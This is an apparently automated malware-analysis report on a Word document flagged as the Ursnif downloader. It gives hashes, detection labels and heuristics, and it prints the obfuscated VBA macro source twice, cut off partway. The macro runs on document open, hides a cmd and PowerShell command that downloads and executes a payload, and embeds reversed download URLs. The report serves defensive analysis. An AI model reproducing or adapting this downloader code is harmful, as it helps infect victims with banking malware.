ursnif Office (OLE) malware analysis — malicious · 4a1940aba467e741

MALICIOUS

Office (OLE)

73.4 KB Created: 2018-09-12 00:25:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 0f610ac981d21f116ace8c98bf42a398 SHA-1: e720a1c4009445c2bf32e2e3194d475b097811e7 SHA-256: 4a1940aba467e741a2e6bebb602ea77ba0d07a0bf1040a9ee589da19032a2deb

182 Risk Score

Malware Insights

ursnif · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute commands. This behavior is indicative of a downloader, and ClamAV detection confirms it as URSNIF. The macro appears to construct a command to download and execute a payload, although the exact command is truncated.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6422 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6422 bytes
SHA-256: `152dcccbbe3c389789f0073b3c69227d7f6805805ece47a07e6a44d57276fbd7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FtwstYcYSKwEQK" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next VarType "3876" + "MnuL" VarType "m" + "Ukh" VarType "7425" + "S" VarType "jr" + "5896" + "119713503" + "sBA" VarType "umuMaDYzjAivTB" + "502092475" + "nAwYHEfzqNbBR" + "Sj" VarType "zf" + "SMZun" VarType "nSipVZ" + "ui" + "LFwsKjcQjPS" + "PmDwzBGiQRBRj" VarType "24333524" + "Rin" Shell azqEFNOHO + NYuGNFE, Format(vbHide) VarType "NGdS" + "XsGSd" VarType "PJUmOQk" + "o" VarType "XRQOQq" + "GWhw" + "nK" + "4812" VarType "LIz" + "YaZs" VarType "CwmWaEoz" + "uD" + "LaVilJ" + "FVVz" End Sub Attribute VB_Name = "huwGkBsrEXwa" Function azqEFNOHO() On _ Error _ Resume _ Next VarType "iIcudkjzsWjS" + "tY" VarType "JS" + "215112845" VarType "151846085" + "2066" VarType "zPfKo" + "52642209" wqLkCG = Format(Chr(6 + 5 + 10 + 1 + 77)) + "md /V" + "/" + Format(Chr(4 + 3 + 7 + 0 + 53)) + Format(Chr(2 + 1 + 3 + 0 + 28)) + "^s^" + "et ^" + "Z^eqH" VarType "115539891" + "sWChbsGsSR" VarType "Qu" + "wRFQ" + "4327" + "3649" SvczZoXnI = "= ^ " + " " + " ^ ^ ^" + " " + "^ " + "^" + "}^}{h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "t^a" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "}^;" + "kaer" + "b" + "^;^m" + "N^l$^" + " me" VarType "HP" + "hO" VarType "RI" + "vNzURQiwZaWpBh" + "9485" + "nkRPbYGpZO" VarType "mU" + "mEujjiJ" + "5140" + "BBtVq" KGtjiTBImIP = "tI^-e^k" + "^ovn" + "I;)mNl$" + "^ ," + "XX^" + "l$(^eli" + "F^d^a^" + "o^ln" + "woD^." + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" VarType "nnRvRAEdM" + "321248922" + "132547621" + "57585535" VarType "j" + "8410" + "234824351" + "oY" VarType "182405393" + "pw" + "7551" + "250379215" cldvYznrivc = "B^M$^{y" + "rt{" + ")" + Format(Chr(4 + 3 + 7 + 0 + 53)) + "o" + "^j$^ n" + "i^ " + "X^X^l^" + "$" + "(" VarType "ECrD" + "5147" + "DMwXclBXo" + "VYETzdBlXOpPhF" VarType "6514" + "G" + "wCNLrGm" + "521965617" VarType "DPU" + "GM" kahbWRok = "^h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "aero^" + "f^;" + "^'ex^" + "e^.^'+^" + "X^h^z" VarType "TKMQSEQcI" + "r" + "3657" + "375034381" VarType "DRT" + "roisOdtH" VarType "687" + "uEJiLLnAuNYd" + "XaNOpS" + "T" nulzKfAO = "^$^+'\" + "^'" + "^+" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "i^l^" + "b^u^p:" + "v" + "n^e^" + "$" VarType "QUK" + "8843" VarType "FNrW" + "175601914" VarType "QqwX" + "9975" + "1900" + "4904" JMAVGSbzEW = "=mN^l$^" + ";'" + "^024" + "'^ =^" + " ^" + "Xh^z" + "^$;)^'" + "^@^'(^" + "ti^l^p" VarType "aGSq" + "GnvS" VarType "mLcXjW" + "2247" VarType "Hh" + "7114" + "fGlAORaJQ" + "9283" LboFQJrT = "S" + ".^'TT1" + "q^2/" + "^lp" + "." + "ta^iw" + "^k" + "^-or^" + "u" + "e//" VarType "293900752" + "1323" VarType "GTYkk" + "X" DCtUQbtLO = ":" + "p^t^t^h" + "@" + "mVZ" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "R/^" + "t^" + "en.^s" + "r^" + "ot" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "a" + "r" VarType "ruMkX" + "ud" + "275244492" + "jWD" VarType "w" + "9095" VarType "201722938" + "nUwSqvBr" + "1282" + "BhiEj" VarType "8242" + "WT" VarType "b" + "SZFrmTE" + "MHoNPRu" + "VIB" aALVIVA = "^tn" + "^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^-eg^" + "atireh/" + "/:^p" + "^t^" + "t^h" + "@l^B^y^" + "A/^" + "m^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "." + "om^hs" + "^a^ml" + "a^p" VarType "ic" + "CU" + "aVjH" + "wE" VarType "w" + "GRVL" + "514313996" + "WwPMrRc" OmiquzS = "s^alle" + "t^o^h/" + "/:^" + "pt^th^@" + "E/^" VarType "7801" + "moRi" + "lb" + "uXA" VarType "wPfiYk" + "239530499" VarType "335836338" + "Dh" + "RaZAzBWi" + "uRtqU" VarType "6677" + "280806553" oPSDYHhcc = "mo" + Format(Chr(6 + 5 + 10 + 1 + 77)) + ".ss^e" + Format(Chr(6 + 5 + 10 + 1 + 77)) + Format(Chr(6 + 5 + 10 + 1 + 77)) + "u^s" + "^g" + "n^ill^" ... (truncated)

SHA-256: 152dcccbbe3c389789f0073b3c69227d7f6805805ece47a07e6a44d57276fbd7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FtwstYcYSKwEQK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "3876" + "MnuL"
   VarType "m" + "Ukh"
   VarType "7425" + "S"
   VarType "jr" + "5896" + "119713503" + "sBA"
   VarType "umuMaDYzjAivTB" + "502092475" + "nAwYHEfzqNbBR" + "Sj"
   VarType "zf" + "SMZun"
   VarType "nSipVZ" + "ui" + "LFwsKjcQjPS" + "PmDwzBGiQRBRj"
   VarType "24333524" + "Rin"
Shell azqEFNOHO + NYuGNFE, Format(vbHide)
   VarType "NGdS" + "XsGSd"
   VarType "PJUmOQk" + "o"
   VarType "XRQOQq" + "GWhw" + "nK" + "4812"
   VarType "LIz" + "YaZs"
   VarType "CwmWaEoz" + "uD" + "LaVilJ" + "FVVz"
End Sub



Attribute VB_Name = "huwGkBsrEXwa"
Function azqEFNOHO()

On _
Error _
Resume _
Next
VarType "iIcudkjzsWjS" + "tY"
   VarType "JS" + "215112845"
   VarType "151846085" + "2066"
   VarType "zPfKo" + "52642209"
wqLkCG = Format(Chr(6 + 5 + 10 + 1 + 77)) + "md /V" + "/" + Format(Chr(4 + 3 + 7 + 0 + 53)) + Format(Chr(2 + 1 + 3 + 0 + 28)) + "^s^" + "et ^" + "Z^eqH"
VarType "115539891" + "sWChbsGsSR"
   VarType "Qu" + "wRFQ" + "4327" + "3649"
SvczZoXnI = "=  ^  " + "   " + " ^ ^ ^" + "   " + "^    " + "^" + "}^}{h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "t^a" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "}^;" + "kaer" + "b" + "^;^m" + "N^l$^" + " me"
VarType "HP" + "hO"
   VarType "RI" + "vNzURQiwZaWpBh" + "9485" + "nkRPbYGpZO"
   VarType "mU" + "mEujjiJ" + "5140" + "BBtVq"
KGtjiTBImIP = "tI^-e^k" + "^ovn" + "I;)mNl$" + "^ ," + "XX^" + "l$(^eli" + "F^d^a^" + "o^ln" + "woD^." + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^"
VarType "nnRvRAEdM" + "321248922" + "132547621" + "57585535"
   VarType "j" + "8410" + "234824351" + "oY"
   VarType "182405393" + "pw" + "7551" + "250379215"
cldvYznrivc = "B^M$^{y" + "rt{" + ")" + Format(Chr(4 + 3 + 7 + 0 + 53)) + "o" + "^j$^ n" + "i^ " + "X^X^l^" + "$" + "("
VarType "ECrD" + "5147" + "DMwXclBXo" + "VYETzdBlXOpPhF"
   VarType "6514" + "G" + "wCNLrGm" + "521965617"
   VarType "DPU" + "GM"
kahbWRok = "^h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "aero^" + "f^;" + "^'ex^" + "e^.^'+^" + "X^h^z"
VarType "TKMQSEQcI" + "r" + "3657" + "375034381"
   VarType "DRT" + "roisOdtH"
   VarType "687" + "uEJiLLnAuNYd" + "XaNOpS" + "T"
nulzKfAO = "^$^+'\" + "^'" + "^+" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "i^l^" + "b^u^p:" + "v" + "n^e^" + "$"
VarType "QUK" + "8843"
   VarType "FNrW" + "175601914"
   VarType "QqwX" + "9975" + "1900" + "4904"
JMAVGSbzEW = "=mN^l$^" + ";'" + "^024" + "'^ =^" + " ^" + "Xh^z" + "^$;)^'" + "^@^'(^" + "ti^l^p"
VarType "aGSq" + "GnvS"
   VarType "mLcXjW" + "2247"
   VarType "Hh" + "7114" + "fGlAORaJQ" + "9283"
LboFQJrT = "S" + ".^'TT1" + "q^2/" + "^lp" + "." + "ta^iw" + "^k" + "^-or^" + "u" + "e//"
VarType "293900752" + "1323"
   VarType "GTYkk" + "X"
DCtUQbtLO = ":" + "p^t^t^h" + "@" + "mVZ" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "R/^" + "t^" + "en.^s" + "r^" + "ot" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "a" + "r"
VarType "ruMkX" + "ud" + "275244492" + "jWD"
   VarType "w" + "9095"
   VarType "201722938" + "nUwSqvBr" + "1282" + "BhiEj"
   VarType "8242" + "WT"
   VarType "b" + "SZFrmTE" + "MHoNPRu" + "VIB"
aALVIVA = "^tn" + "^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^-eg^" + "atireh/" + "/:^p" + "^t^" + "t^h" + "@l^B^y^" + "A/^" + "m^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "." + "om^hs" + "^a^ml" + "a^p"
VarType "ic" + "CU" + "aVjH" + "wE"
   VarType "w" + "GRVL" + "514313996" + "WwPMrRc"
OmiquzS = "s^alle" + "t^o^h/" + "/:^" + "pt^th^@" + "E/^"
VarType "7801" + "moRi" + "lb" + "uXA"
   VarType "wPfiYk" + "239530499"
   VarType "335836338" + "Dh" + "RaZAzBWi" + "uRtqU"
   VarType "6677" + "280806553"
oPSDYHhcc = "mo" + Format(Chr(6 + 5 + 10 + 1 + 77)) + ".ss^e" + Format(Chr(6 + 5 + 10 + 1 + 77)) + Format(Chr(6 + 5 + 10 + 1 + 77)) + "u^s" + "^g" + "n^ill^" 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.